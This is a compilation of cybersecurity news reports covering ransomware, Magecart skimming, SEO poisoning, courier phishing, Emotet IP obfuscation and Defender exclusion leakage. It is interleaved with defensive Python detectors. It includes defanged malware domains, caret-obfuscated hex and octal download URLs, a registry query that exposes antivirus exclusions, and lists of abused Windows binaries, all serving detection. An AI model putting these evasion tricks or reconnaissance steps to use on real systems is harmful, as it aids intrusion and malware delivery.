
The Impact of Geopolitical Turmoil on the Cybersecurity Threat Landscape


Ransomware remains one of the top threats in the new report, with more than 10 terabytes of data stolen each month, and phishing has emerged as the most common initial access vector for these attacks. Ranking close behind ransomware are attacks on availability, most visibly Distributed Denial of Service (DDoS) attacks.

However, geopolitics, in particular Russia's invasion of Ukraine, acted as a game changer for the global cyber domain during the reporting period. While the number of threats continues to rise, a wider range of vectors is also emerging, such as zero-day exploits, AI-enabled disinformation and deepfakes. The result is more malicious and widespread attacks with greater destructive potential.

EU Agency for Cybersecurity (ENISA) Executive Director Juhan Lepassaar stated that “Today’s global context is inevitably driving major changes in the cybersecurity threat landscape. The new paradigm is shaped by the growing range of threat actors. We enter a phase which will need appropriate mitigation strategies to protect all our critical sectors, our industry partners, and therefore all EU citizens.”

During the reporting period of July 2021 to July 2022, the most prominent threat actors were state-sponsored, cybercrime, hacker-for-hire actors, and hacktivists.

Based on an analysis of the proximity of cyber threats to the European Union (EU), the number of incidents in the NEAR category remained high over the reporting period. This category covers affected networks and systems that are controlled and secured within EU borders, as well as the affected population inside the EU.

Threat assessment across industries

The breakdown of threats by sector, added to the report last year, is important because it puts the identified threats in context. The analysis shows that no industry is immune. Nearly 50% of threats target three categories: public administration and governments (24%), digital service providers (13%) and the general public (12%), while the other half is spread across all other sectors of the economy.

ENISA classified threats into eight categories. How prominent each one remains is determined by its frequency and severity:
  • Ransomware: 60% of affected organizations may have paid ransom demands
  • Malware: 66 disclosures of zero-day vulnerabilities were observed in 2021
  • Social engineering: Phishing remains a popular technique, with newer variants such as spear-phishing, whaling, smishing and vishing on the rise
  • Threats against data: Increasing in proportion to the total amount of data produced
  • Threats against availability (denial of service): The largest DDoS attack ever launched in Europe took place in July 2022
  • Threats against availability (internet threats): Destruction of infrastructure, outages and rerouting of internet traffic
  • Disinformation – misinformation: Escalating AI-enabled disinformation, deepfakes and disinformation-as-a-service
  • Supply chain targeting: Third-party incidents accounted for 17% of intrusions in 2021, compared to less than 1% in 2020
Emerging contextual trends:
  • Cunning threat actors are turning to zero-day exploits to accomplish their goals.
  • Since the Russia-Ukraine war began, a new wave of hacktivism has emerged.
  • DDoS attacks are becoming more sophisticated as they migrate to mobile networks and the Internet of Things (IoT), both of which are now being used in cyber warfare.
  • AI-powered deepfakes and disinformation: by flooding government agencies with fake content and comments, bots impersonating real personas can disrupt the "notice-and-comment" rule-making process as well as community interaction.
A threat impact assessment identifies five types of impact: reputational, digital, economic, physical and social damage, although the impact of most incidents remains unknown because victims do not disclose information or the information is incomplete.

The motivation behind the top threats was also examined. According to the findings, ransomware is purely financially motivated. Geopolitics, through espionage and disruption, motivates state-sponsored groups, while ideology may drive hacktivist operations.

Cyberattacks Against US Hospitals are Growing Rapidly

Ransomware has emerged as one of the most challenging issues in cybersecurity and a threat to industries worldwide. Ransomware operators extort businesses and organizations by breaking into their networks and holding computers and files hostage. When it hits hospital networks and cascades across the country, it can have a particularly severe impact on patient care.

According to The Des Moines Register, ransomware actors hit MercyOne in the first days of October as part of a broader attack that caused hospital-wide outages at many other health systems. It was unclear how many of the 140 hospitals managed by CommonSpirit Health, a nonprofit healthcare organization headquartered in Chicago, were affected; the organization declined to disclose the number.

After her 3-year-old son had his tonsils removed, Kelley Parsi brought him to a hospital in Des Moines, Iowa, expecting the staff to treat his pain and dehydration and send him home. Instead, she said, the visit turned into one of the most terrifying days of her life.

A resident doctor told her that he had accidentally given her son five times the prescribed dose because the computer system that automatically calculates medication doses was not working. She later learned that part of the hospital's digital equipment had been knocked out by a cyberattack. She waited several hours in fear while her son's body metabolized the overdose.

CommonSpirit, which operates more than 140 hospitals in the United States, also declined to say how many of its locations were experiencing delays. A number of hospitals have nonetheless reported being affected, including Virginia Mason Franciscan Health in Seattle, some St. Luke's hospitals in Texas and CHI Memorial Hospital in Tennessee.

According to Brett Callow, an analyst at the cybersecurity company Emsisoft, ransomware has been used to breach 19 major hospital chains in the United States this year.

Citing patient confidentiality, MercyOne, Parsi's hospital, declined to comment on her son's case. "It was dedicated to delivering safe, high-quality treatment for all patients we serve in their time of need," a representative said in a statement.

The U.S. government designates health care as one of 16 critical infrastructure sectors, and attackers view healthcare organizations as prime targets.

Moreover, a major assessment by the Cybersecurity and Infrastructure Security Agency (CISA) and a survey of healthcare IT professionals both concluded that a ransomware attack on a hospital strains its overall capacity and is associated with higher mortality rates.

Cyber-attacks on Port of Los Angeles Doubled Since Pandemic


According to recent research, one of the world's biggest ports has seen an unusual spike in cyber-attacks since the pandemic began. The Port of Los Angeles' executive director, Gene Seroka, told the BBC World Service over the weekend that the facility now faces roughly 40 million attacks every month.

"Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce. We must take every precaution against potential cyber-incidents, particularly those that could threaten or disrupt the flow of cargo,” he further added. 

Ransomware, malware, spear phishing and credential harvesting appear to be among the threats aimed at the facility, which is the busiest port in the Western Hemisphere. In many cases the goal appears to be harming the US economy, although profit through extortion and data theft is also a factor.

Such threats, if not adequately managed, could worsen COVID-era supply chain snarls. Seroka said the port backlog will not be cleared completely until next year, even though the number of container ships waiting more than two days to unload has reportedly fallen from 109 in January to 20 today.

"The past two years have proven the vital role that ports hold to our nation's critical infrastructure, supply chains and economy. It's paramount we keep the systems as secure as possible," Seroka expressed. 

The challenge is acute enough that the port has established one of the world's first Cyber Resilience Centers in collaboration with the FBI. It gives port stakeholders such as shipping companies a single place to receive, evaluate and exchange threat intelligence.

Because of their strategic importance to global trade, ports have become a popular target for cyber-criminals, particularly those aiming to disrupt operations and extort businesses.

Even When Switched Off, iPhones are Vulnerable to Attack


Researchers have determined that the way Apple implements wireless features such as Bluetooth, Near Field Communication (NFC) and Ultra-wideband (UWB) in the device, features that keep running autonomously after shutdown, could be exploited by attackers to target iPhones even when they are turned off.

These features, which have access to the iPhone's Secure Element (SE) where sensitive data is stored, stay on even when modern iPhones are turned off, according to a team of researchers from Germany's Technical University of Darmstadt. This allows attackers to "load malware onto a Bluetooth chip that is performed when the iPhone is off," according to a research paper titled "Evil Never Sleeps: When Wireless Malware Stays On After Turning Off iPhone."

According to Jiska Classen, Alexander Heinrich, Robert Reith and Matthias Hollick of the university's Secure Mobile Networking Lab, by compromising these wireless features attackers could gain access to sensitive information such as a user's credit card data, banking details or even the digital car keys on the device. The researchers noted that while the risk is real, exploiting it is not simple: threat actors still need to load malware onto the iPhone while it is turned on so that it executes after the phone is turned off, which requires system-level access or remote code execution (RCE), obtainable for example through known weaknesses such as BrakTooth.

The root cause is the current implementation of low power mode (LPM) for wireless chips on iPhones. The researchers distinguish this LPM, which the chips themselves use, from the battery-saving Low Power Mode that iPhone users can enable. Because LPM support is built into the iPhone's hardware, it cannot be removed by software updates and has "a long-term impact on the broader iOS security paradigm," according to the researchers.

The researchers disclosed their findings to Apple before publishing the paper, but say the company did not provide feedback on the issues raised. One possible fix they suggest is for Apple to implement "a hardware-based switch to disconnect the battery" so that these wireless components receive no power while the iPhone is turned off.

Is Malware Analysis Challenging?


To reduce both the likelihood and the potential impact of cyberattacks, security teams need better detection and analysis capabilities. Yet organizations remain limited in their ability to detect and respond to advanced and targeted attacks because of a shortage of qualified cybersecurity personnel, an overabundance of tools and broken processes.

To address these problems, OPSWAT has released two new solutions that aim to reduce the time and effort required for manual analysis, remove the need for specialized expertise and break down barriers between diverse tools and workflows:

  • OPSWAT Sandbox 
  • MetaDefender Malware Analyzer

"Malware analysis is a vital tool for management teams looking to go beyond check-the-box compliance procedures toward the proactive threat management and crisis response programs," said OPSWAT CEO Benny Czarny. "Organizations are undertaking a change to keep ahead of skilled adversaries which are attacking vital infrastructure to remain abreast of these attacks." 

The two tools work together to make malware analysis smarter, producing faster and more accurate results with less manual effort. MetaDefender Malware Analyzer is a unified, fully integrated platform for malware tool integration, analysis orchestration, playbook automation and aggregated reporting across multiple analysis tools.

Finding, training and retaining malware analysts is difficult for businesses. The hardest part of hiring is that there are not enough qualified candidates, so the vast majority of businesses rely on existing staff to learn malware analysis skills, even though almost half of them say good training programs are hard to find. These firms also acknowledge that the malware analysis function is understaffed: more than half reported worker burnout in the last 12 months, and more than half reported that members of their existing teams were being actively recruited by others.

Malware analysis tools fall short on automation, integration and accuracy. The biggest problem with malware analysis tooling is the lack of automated tools that integrate with one another; without them, malware analysis degenerates into a time-consuming and error-prone manual procedure spread across many tools and workflows. Accuracy is the most important criterion when evaluating malware analysis tools, yet only around a quarter of businesses are confident in their ability to detect, investigate and resolve malware attacks.

Cuba Ransomware Hacked Microsoft Exchange Servers


The Cuba ransomware operation is exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices. Cybersecurity firm Mandiant tracks the group as UNC2596 and the ransomware itself as COLDDRAW.

Cuba is the name by which the malware is most commonly known. The Cuba ransomware operation began in late 2019 and, after a slow start, gained traction in 2020 and 2021. In December 2021, the FBI issued a Cuba ransomware advisory stating that the group had compromised 49 critical infrastructure organizations in the United States. According to the new Mandiant analysis, the Cuba operation predominantly targets the United States, followed by Canada. Since August 2021 the gang has been exploiting Microsoft Exchange vulnerabilities to deploy web shells, RATs and backdoors and gain a foothold on target networks.

"Mandiant has also identified the exploitation of Microsoft Exchange vulnerabilities, including ProxyShell and ProxyLogon, as another access point leveraged by UNC2596 likely as early as August 2021," explains Mandiant in a new report. 

Among the backdoors planted are Cobalt Strike and the NetSupport Manager remote access tool, although the group also uses its own tools: Bughatch, Wedgecut, eck.exe and Burntcigar.
  • Wedgecut comes in the form of an executable named “check.exe,” which is a reconnaissance tool that enumerates the Active Directory through PowerShell.
  • Bughatch is a downloader that fetches PowerShell scripts and files from the C&C server. To evade detection, it loads in memory from a remote URL.
  • Burntcigar is a utility that can terminate processes at the kernel level by exploiting a flaw in an Avast driver, which is included with the tool for a “bring your own vulnerable driver” attack.
Finally, Termite is a memory-only dropper that downloads and loads the payloads mentioned earlier. However, this tool has been seen in campaigns by a variety of threat groups, indicating that it is not exclusively utilised by Cuba threat actors. 

The threat actors elevate access using stolen account credentials obtained with the widely available Mimikatz and Wicker tools. They then run Wedgecut for network reconnaissance before moving laterally with RDP, SMB, PsExec and Cobalt Strike. Termite then loads Bughatch, followed by Burntcigar, which disables security tools and lays the groundwork for data exfiltration and file encryption. For exfiltration the Cuba gang does not use cloud services; instead it transfers everything to its own private infrastructure.

Changing Operations 

In May 2021 Cuba ransomware teamed up with the spammers behind the Hancitor malware to gain access to corporate networks via DocuSign-themed phishing emails. Since then, Cuba's operations have shifted to vulnerabilities in public-facing services, such as the Microsoft Exchange ProxyShell and ProxyLogon flaws. Because security updates for the exploited vulnerabilities have been available for months, this shift makes the attacks potent against organizations that have not patched but also easier to prevent.

Once there are no more valuable targets running unpatched Microsoft Exchange servers, the Cuba operation will likely shift its focus to other vulnerabilities. Applying available security updates as soon as vendors release them is therefore critical to maintaining a strong security posture against even the most sophisticated threat actors.

Several Magento Sites were Targeted by a Surge of MageCart Attacks


A large number of online stores running the Magento 1 e-commerce platform were hit by a web skimmer, according to Sansec, an e-commerce security consultancy.

Sansec's crawler detected roughly 374 infections in a single day, indicating a mass attack. The skimmer was loaded from the domain naturalfreshmall[.]com, which is now offline. The operators' goal was to steal the credit card information of customers of the targeted online stores.

The attackers typically used a security flaw in the Quickview plugin to insert rogue admin users into vulnerable Magento stores as the initial intrusion vector. In this campaign, however, the flaw was exploited to add a default value, which caused the database to be updated with a file carrying a simple backdoor. Merely browsing the Magento login page then triggered the validation rules for prospective customers, which in turn triggered the code execution.

The abuse is possible by adding a default value to the customer_eav_attribute table. The host application is tricked into creating a malicious object, which is then used to generate a basic backdoor (api_1.php). According to Sansec, the intruders installed 19 backdoors on the compromised system, so affected sites must remove all of them to avoid being re-compromised.

Although thousands of merchants still use it, Magento 1 has reached end of life and Adobe no longer provides security updates for it. As a result, these sites are exposed to a wide range of attacks that put their customers' sensitive information at risk: credit card numbers, mailing addresses, names, phone numbers and email addresses, as well as anything else required to complete an online order.

All Magento administrators should make sure their store is running the latest supported version of the platform and upgrade if it is still on an older, unsupported version.

BATLOADER and Atera Agent are Being Distributed Through an SEO Poisoning Campaign


A new SEO poisoning campaign is underway, aiming to infect targeted systems with the BATLOADER malware and the Atera Agent remote management tool. It appears to target professionals looking to download productivity applications such as TeamViewer, Zoom or Visual Studio. SEO poisoning is a tactic in which attackers build malicious websites stuffed with keywords that people typically look up in search engines, then use various search engine optimization (SEO) techniques to make those sites rank prominently in search results.

According to a report by Mandiant researchers, in this SEO campaign the threat actors compromise legitimate websites in order to plant malicious files or URLs. Users are thus routed to websites hosting malware that poses as well-known applications.

“The threat actor used “free productivity apps installation” or “free software development tools installation” themes as SEO keywords to lure victims to a compromised website and to download a malicious installer. The installer contains legitimate software bundled with the BATLOADER malware. The BATLOADER malware is dropped and executed during the software installation process.” said the researchers. 

“This initial BATLOADER compromise was the beginning of a multi-stage infection chain that provides the attackers with a foothold inside the target organization. Every stage was prepared for the next phase of the attack chain. And legitimate tools such as PowerShell, Msiexec.exe, and Mshta.exe allow proxy execution of malicious payloads to avoid detection,” they added. 

A file called "AppResolver.dll" was identified as a significant sample in the attack chain. The DLL is an internal component of Microsoft Windows, but it contains malicious VBScript inserted in such a way that the code signature remains valid. When run on its own, the DLL does not execute the VBScript; when run with Mshta.exe, Mshta.exe locates and executes the VBScript without error.

This issue is similar to CVE-2020-1599 in that the PE Authenticode signature remains valid after HTA-compatible script is appended to a file signed by any software developer. Such PE+HTA polyglots (.hta files) can be executed by Mshta.exe to bypass security controls that rely on Windows code signing to decide whether a file is trusted.

In this case, the researchers found that arbitrary script data had been appended to the signature section of a legitimately signed Windows PE file, after the end of the ASN.1 structure. As long as the file extension is not '.hta', the resulting polyglot keeps a valid signature. If the polyglot is executed with Mshta.exe, the script contents run successfully, because Mshta.exe skips the PE's bytes, locates the script at the end and executes it.
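The check below, an added example rather than code from Mandiant or from this page, looks for exactly this trick: it walks the PE headers to the Security data directory, parses the WIN_CERTIFICATE entry, measures the DER-encoded PKCS#7 blob by its own length field, and reports any non-padding bytes that follow it (or that follow the whole certificate table), since the Authenticode hash covers neither region. It does not verify the signature itself. build_sample fabricates a minimal PE32+ with a dummy certificate table so the code runs offline, and the script markers are an assumed heuristic, not Mandiant's detection logic.

```python
import struct

# Assumed heuristic: strings that betray an HTA/VBScript body riding inside a PE.
SCRIPT_MARKERS = (b"<script", b"<hta:application", b"<html", b"createobject(")


def _der_total_length(blob: bytes):
    """Total length of the DER SEQUENCE at the start of blob (PKCS#7 SignedData), or None."""
    if len(blob) < 2 or blob[0] != 0x30:
        return None
    first = blob[1]
    if first < 0x80:                       # short form length
        return 2 + first
    n = first & 0x7F                       # long form: n length bytes follow
    if n == 0 or len(blob) < 2 + n:
        return None
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def security_directory(pe: bytes):
    """(file offset, size) of IMAGE_DIRECTORY_ENTRY_SECURITY, or None if the PE is unsigned."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt = e_lfanew + 4 + 20                            # skip PE signature and COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd_base = opt + (96 if magic == 0x10B else 112)    # PE32 vs PE32+ data directory start
    off, size = struct.unpack_from("<II", pe, dd_base + 4 * 8)   # entry 4 = Security
    return (off, size) if size else None


def find_appended_script(pe: bytes) -> dict:
    """Report bytes that Authenticode does not hash: inside the certificate table
    after the PKCS#7 blob, or after the table at the end of the file."""
    result = {"inside_cert_table": b"", "after_cert_table": b"", "suspicious": False}
    sec = security_directory(pe)
    if sec is None:
        return result
    off, size = sec
    table = pe[off:off + size]
    if len(table) >= 8:
        # WIN_CERTIFICATE: dwLength, wRevision, wCertificateType, bCertificate[]
        dw_length = struct.unpack_from("<I", table, 0)[0]
        cert = table[8:dw_length]
        der_len = _der_total_length(cert)
        if der_len is not None:
            extra = cert[der_len:]
            # zero bytes of 8-byte alignment padding are normal; anything else is not
            result["inside_cert_table"] = extra if extra.strip(b"\0") else b""
    result["after_cert_table"] = pe[off + size:]
    tail = (result["inside_cert_table"] + result["after_cert_table"]).lower()
    result["suspicious"] = any(marker in tail for marker in SCRIPT_MARKERS)
    return result


def build_sample(script: bytes = b"") -> bytes:
    """Constructed minimal PE32+ carrying a dummy certificate table (not a real signed binary)."""
    der = b"\x30\x82\x00\x10" + b"\xAA" * 16           # fake PKCS#7 SEQUENCE, 20 bytes total
    body = der + script
    body += b"\0" * (-len(body) % 8)                  # pad the entry to 8 bytes
    cert_table = struct.pack("<IHH", 8 + len(body), 0x0200, 0x0002) + body
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)
    table_off = 64 + 4 + 20 + 240                     # headers end here
    dirs = [(0, 0)] * 16
    dirs[4] = (table_off, len(cert_table))
    opt = struct.pack("<H", 0x20B) + b"\0" * 110 + b"".join(struct.pack("<II", *d) for d in dirs)
    return dos + b"PE\0\0" + coff + opt + cert_table


if __name__ == "__main__":
    polyglot = build_sample(b'<script language="VBScript">MsgBox "constructed sample"</script>')
    print(find_appended_script(polyglot))
```

A real deployment would run find_appended_script over signed binaries on disk and treat a non-empty inside_cert_table as a finding even when no marker matches, since a clean signer never leaves non-zero bytes behind the PKCS#7 structure.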

Attackers are Using Shipment-Delivery Scams to Lure Victims to Install Trickbot


Researchers have found that threat actors are increasingly running scams that impersonate package couriers such as DHL or the United States Postal Service (USPS) in authentic-looking phishing emails to trick victims into downloading credential stealers or other malicious payloads. Separately on Thursday, researchers from Avanan, a Check Point company, and from Cofense described current phishing campaigns that use malicious links or attachments to infect computers with Trickbot and other malware.

The researchers said the campaigns rely on trust in commonly used shipping services and on employees' familiarity with receiving emailed documents about shipments to provoke the action needed to compromise corporate systems.

The emails used to deliver Trickbot in recent delivery-themed campaigns carried official USPS branding as well as third-party social-media logos from Facebook, Instagram, LinkedIn and Twitter "to make the email look even more credible," the researchers said. The sender address, however, has nothing to do with USPS, which could easily have tipped off a recipient to the emails' true purpose.

If the bait works and the user clicks the link to the supposed invoice, they are routed to a domain that serves a ZIP file: hxxps:/www.zozter[.]com/tracking/tracking[.]php. The unzipped file is a macro-enabled XLSM spreadsheet called "USPS_invoice_EA19788988US.xlsm" that claims editing must be enabled because of document protection, a common approach in malicious email campaigns. If the victim enables editing, a malicious PowerShell process is launched, which eventually downloads Trickbot.

According to Jeremy Fuchs, cybersecurity researcher and analyst at Avanan, the DHL spoofing attack likewise presents what the threat actors want victims to believe is a shipping document, but this time as an attachment. “By spoofing a popular brand, the hackers are hoping to target vulnerable users who are accustomed to checking for shipping notifications,” he wrote.
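As an added example (not Avanan's or Cofense's tooling), the Python below applies the checks the researchers describe to a raw message: it reads the display name and sender domain from the From header, flags a courier brand claimed in the display name or subject whose sending domain is not one of the brand's own, lists body links that point outside the claimed brand's domains (the USPS case), and lists attachments with archive or macro-enabled extensions (the DHL case). The brand-to-domain table, the sample messages and the scoring are constructed assumptions for illustration, not a vendor's rules.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlsplit

# Assumed, deliberately short table of impersonated brands and the domains they mail from.
BRAND_DOMAINS = {
    "usps": {"usps.com"},
    "dhl": {"dhl.com", "dhl.de"},
    "fedex": {"fedex.com"},
    "ups": {"ups.com"},
}
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
# Archive, disk-image and macro-capable document types used as first-stage droppers.
DROPPER_EXT_RE = re.compile(r"\.(zip|rar|7z|iso|img|xlsm|docm|xls|doc|js|vbs|hta)$", re.IGNORECASE)


def _belongs_to(domain: str, brand: str) -> bool:
    return any(domain == d or domain.endswith("." + d) for d in BRAND_DOMAINS[brand])


def _text_parts(msg) -> str:
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_maintype() == "text":
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def analyze_courier_lure(raw_message: str) -> dict:
    """Score one RFC 822 message for the courier-impersonation pattern."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    claimed_in = (display + " " + msg.get("Subject", "")).lower()
    claimed = [b for b in BRAND_DOMAINS if re.search(rf"\b{b}\b", claimed_in)]
    spoofed = [b for b in claimed if not _belongs_to(sender_domain, b)]
    links = URL_RE.findall(_text_parts(msg))
    offbrand_links = [u for u in links if claimed and not any(
        _belongs_to((urlsplit(u).hostname or "").lower(), b) for b in claimed)]
    dropper_attachments = [fn for fn in (p.get_filename() for p in msg.walk())
                           if fn and DROPPER_EXT_RE.search(fn)]
    if spoofed and (offbrand_links or dropper_attachments):
        verdict = "high"
    elif spoofed or offbrand_links or dropper_attachments:
        verdict = "medium"
    else:
        verdict = "clean"
    return {
        "sender_domain": sender_domain,
        "claimed_brands": claimed,
        "spoofed_brands": spoofed,
        "offbrand_links": offbrand_links,
        "dropper_attachments": dropper_attachments,
        "verdict": verdict,
    }


# Constructed sample in the shape of the USPS lure described above (domains and number are fictional).
SAMPLE_LURE = """\
From: "USPS Delivery Notification" <notice@shipping-updates-mail.example>
To: employee@corp.example
Subject: USPS: your package could not be delivered, invoice XX00000000XX
Content-Type: text/plain; charset="utf-8"

Your parcel is on hold. Download the invoice to reschedule delivery:
https://www.tracking-portal.example/tracking/tracking.php
"""

if __name__ == "__main__":
    print(analyze_courier_lure(SAMPLE_LURE))
```

The display-name check is the one that matters here: the page notes the sender address had nothing to do with USPS, and that mismatch is visible in the header before any link is clicked.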

The practice has become so widespread that DHL replaced Microsoft at the top of Check Point Software's list of brands most imitated by threat actors in the fourth quarter of 2021. Scams involving the courier accounted for 23% of all brand phishing emails during that period, up from 9% in the third quarter.

The researchers attributed the rise in package delivery fraud to a number of factors. Spoofing DHL made perfect sense in the fourth quarter of last year during the busy holiday shopping season, Fuchs wrote in a report on the latest DHL-related fraud published Thursday.

Emotet Spam Campaigns Use Unconventional IP Addresses to Avoid Detection


Trend Micro discovered Emotet spam campaigns using hexadecimal and octal representations of IP addresses to evade pattern-matching detection. Both variants rely on social engineering to trick users into enabling document macros, which then automate malware execution. When these non-standard notations are received, the operating system automatically converts them to the dotted-decimal quad representation before initiating the request to the remote server.

Users and enterprises are advised to detect and block these patterns and enable the appropriate security measures to prevent compromise, since Emotet is used to deliver second-stage malware such as TrickBot and Cobalt Strike.

Emotet first surfaced in 2014, when researchers found a relatively simple banking Trojan distributed via phishing emails. Over the years it evolved into a Malware-as-a-Service botnet, selling access to compromised computers to those willing to pay. Unfortunately there was no shortage of buyers, including ransomware gangs such as Ryuk and the operators of the data-stealing malware Trickbot, who immediately took advantage of the initial access Emotet provided, picking and choosing which victims to hit with follow-on payloads.

According to Europol, Emotet's ability to move laterally between devices on a network made it one of the most durable pieces of malware seen in recent years. It became one of the most serious threats researchers have observed, consistently ranking among the top ten campaigns detected, with over 1.6 million victim machines according to the DoJ.

The samples researchers discovered begin with an emailed document that uses Excel 4.0 macros, an antiquated technology intended to automate repetitive tasks in Excel that malicious actors have exploited to distribute malware. Here the feature is abused so that the malware runs as soon as the document is opened, via the auto-open macro. Carets are used to obfuscate the URL, and the host portion is a hexadecimal representation of the IP address.

When the macro runs, it invokes cmd.exe, which in turn invokes mshta.exe with the URL containing the hex IP address as an argument, downloading and executing HTML Application (HTA) code from the remote host.
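As an added example that is not part of Trend Micro's write-up, the Python below reverses the two obfuscation layers described above: it strips the cmd.exe caret escapes and converts a host written in hexadecimal, octal, plain 32-bit integer or mixed notation to the dotted-decimal form a pattern-based rule would have matched. It follows the inet_aton() component rules (a component with a leading 0 is octal, 0x is hex, and in a short form the last component fills the remaining bytes), which is what the OS-level conversion the text mentions does. The sample URLs are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit

# One numeric component as inet_aton()-style parsers accept it: hex, octal or decimal.
_NUM = r"(?:0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)"
_HOST_RE = re.compile(rf"^{_NUM}(?:\.{_NUM}){{0,3}}$", re.IGNORECASE)


def _component(token: str) -> int:
    t = token.lower()
    if t.startswith("0x"):
        return int(t[2:], 16)
    if len(t) > 1 and t.startswith("0"):
        return int(t, 8)
    return int(t, 10)


def normalize_ipv4_host(host: str):
    """Return the dotted-decimal form of an IPv4 host written in hex, octal or
    integer notation (or plain dotted decimal), or None if it is not an IPv4 literal."""
    if not _HOST_RE.match(host):
        return None
    parts = [_component(p) for p in host.split(".")]
    # With fewer than four components the last one fills the remaining bytes:
    # a.b.c.d -> 1,1,1,1 bytes; a.b.c -> 1,1,2; a.b -> 1,3; a -> 4
    widths = [1] * (len(parts) - 1) + [5 - len(parts)]
    value = 0
    for part, width in zip(parts, widths):
        if part >= 1 << (8 * width):
            return None                      # component too large for its slot
        value = (value << (8 * width)) | part
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def decode_obfuscated_url(raw: str):
    """Strip cmd.exe caret escapes and canonicalise the host.
    Returns (cleaned_url, dotted_decimal_or_None, host_was_unconventional)."""
    url = raw.replace("^", "")
    host = urlsplit(url).hostname or ""
    canonical = normalize_ipv4_host(host)
    if canonical is None:
        return url, None, False
    return url, canonical, canonical != host


# Constructed samples in the style of the Emotet macro URLs described above.
SAMPLES = [
    "h^tt^p^:/^/0xb907d607/fer/fer.html",        # hex, single 32-bit value
    "h^tt^p^:/^/0056.0007.0326.0007/cc.html",    # octal, four components
    "http://3104298503/x",                        # plain 32-bit decimal
    "http://185.7.214.7/x",                       # ordinary dotted decimal
    "http://example.com/x",                       # not an IP literal at all
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(decode_obfuscated_url(raw))
```

A proxy or mail-gateway rule that canonicalises hosts this way before matching its IP block list closes the gap the campaign relied on; the third return value lets you alert on the mere presence of a non-standard notation, which legitimate mail almost never uses.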

Between November and December 2021, Emotet was seen indiscriminately dropping Cobalt Strike beacons. This year, however, the operators have been noticeably more selective about which targets receive the beacons. Evasion techniques like these can be read as proof that the attackers keep innovating to defeat pattern-based detection technologies, and the atypical use of hexadecimal and octal IP addresses may slip past existing solutions that rely on pattern matching.

Because of a Flaw in Microsoft Defender, Threat Actors can Evade Detection


Threat actors could use a weakness in Microsoft Defender antivirus on Windows to learn which locations are excluded from scanning and plant malware there. According to several users, the issue has existed for at least eight years and affects Windows 10 21H1 and Windows 10 21H2. Security researchers report that the list of locations Microsoft Defender does not scan is unprotected and readable by any local user.

Windows Defender is the anti-malware component of Microsoft Windows. It was first made available as a free anti-spyware download for Windows XP and was then bundled with Windows Vista and Windows 7. It has since evolved into a full antivirus solution, replacing Microsoft Security Essentials in Windows 8 and later editions.

Local users, regardless of their permissions, can query the registry to see which paths Microsoft Defender is not allowed to check for malware. According to Antonio Cocomazzi, the SentinelOne threat researcher who reported the RemotePotato0 vulnerability, this sensitive information has no protection: running the "reg query" command reveals everything Microsoft Defender is configured not to scan, whether files, folders, extensions or processes.

Like any other antivirus product, Microsoft Defender allows customers to specify which locations (local or network) on their machines should be excluded from malware scanning. Exclusions are routinely used to stop the antivirus from interfering with legitimate applications that have been wrongly flagged as malware. Because the list of exclusions differs from system to system, this information is valuable to an attacker already on the host: it tells them where they can drop malicious files without fear of detection.

Microsoft Defender Antivirus on Windows Server 2016 and Windows Server 2019 additionally applies automatic exclusions based on the server's role. These are not shown in the normal exclusion lists. Because Microsoft Defender Antivirus is built into Windows Server 2016 and later, exclusions for operating system files and server roles are applied automatically, while custom exclusions can still be defined by administrators.
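The following Python, an added example and not the researchers' tooling, takes the text that `reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s` prints (the command referred to above), parses the Paths, Extensions, Processes and TemporaryPaths subkeys, and audits them the way a defender should before an attacker does: whole drives, shares, wildcard paths, well-known drop directories, executable extensions and living-off-the-land binaries are flagged. The registry path is the real one; the sample output, the lists of risky names and the reasons attached to findings are assumptions chosen for the demonstration.

```python
import re

EXCLUSION_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions"
# reg query prints values as: <4 spaces>name<4 spaces>REG_TYPE<4 spaces>data
VALUE_LINE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")

# Assumed lists: exclusions that hand an intruder a large unscanned drop zone
# instead of carving out one application.
BROAD_DIR_NAMES = {"users", "public", "windows", "temp", "tmp", "programdata", "downloads", "appdata"}
RISKY_EXTENSIONS = {".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".tmp", ".zip"}
RISKY_PROCESSES = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                   "rundll32.exe", "regsvr32.exe", "msbuild.exe", "certutil.exe"}


def parse_reg_query(output: str) -> dict:
    """Turn the text of `reg query "<EXCLUSION_ROOT>" /s` into {category: [excluded values]}."""
    exclusions, category = {}, None
    for line in output.splitlines():
        if line.startswith(EXCLUSION_ROOT):
            category = line[len(EXCLUSION_ROOT):].strip("\\") or None   # Paths, Extensions, ...
            if category:
                exclusions.setdefault(category, [])
            continue
        m = VALUE_LINE.match(line)
        if m and category:
            exclusions[category].append(m.group(1))
    return exclusions


def is_broad_path(path: str) -> bool:
    norm = path.rstrip("\\").lower()
    if re.fullmatch(r"[a-z]:", norm):                  # a whole drive
        return True
    if re.fullmatch(r"\\\\[^\\]+\\[^\\]+", norm):       # a whole network share
        return True
    if "*" in norm or "?" in norm:                     # wildcard exclusions
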